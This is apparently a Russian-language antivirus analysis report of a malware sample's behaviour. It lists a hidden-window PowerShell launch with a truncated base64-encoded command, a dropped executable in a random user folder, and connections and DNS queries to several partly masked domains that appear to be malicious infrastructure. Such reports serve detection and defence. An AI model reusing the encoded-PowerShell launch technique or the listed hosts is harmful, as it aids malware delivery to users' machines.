Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAFQALQBpAHQAZQBNACAAdgBBAFIASQBhAEIATABlADoAbgBpADcAOABFACAAKAAgAFsAdAB5AFAAZQBdACgAIgB7ADMAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQAiAC0AZgAnAFMAdABFAE0ALgBpACcALA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1070010.cvr
- %HOMEPATH%\yqqsz8u\m8q3a_i\iomnei9bz.exe
- %HOMEPATH%\yqqsz8u\m8q3a_i\iomnei9bz.exe
- %HOMEPATH%\yqqsz8u\m8q3a_i\iomnei9bz.exe
- '4g###dloom.com':80
- '4g###dloom.com':443
- 'bu####sgateway.com':80
- 'pi####delcielo.com':443
- 'kv##edu.org':80
- 'hu####atviet.com':80
- 'wh####oors.co.uk':443
- '4g###dloom.com':443
- 'pi####delcielo.com':443
- 'wh####oors.co.uk':443
- DNS ASK dr####asreedhar.com
- DNS ASK 4g###dloom.com
- DNS ASK bu####sgateway.com
- DNS ASK pi####delcielo.com
- DNS ASK kv##edu.org
- DNS ASK to###ami.com
- DNS ASK hu####atviet.com
- DNS ASK wh####oors.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAFQALQBpAHQAZQBNACAAdgBBAFIASQBhAEIATABlADoAbgBpADcAOABFACAAKAAgAFsAdAB5AFAAZQBdACgAIgB7ADMAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQAiAC0AZgAnAFMAdABFAE0ALgBpACcALA...' (со скрытым окном)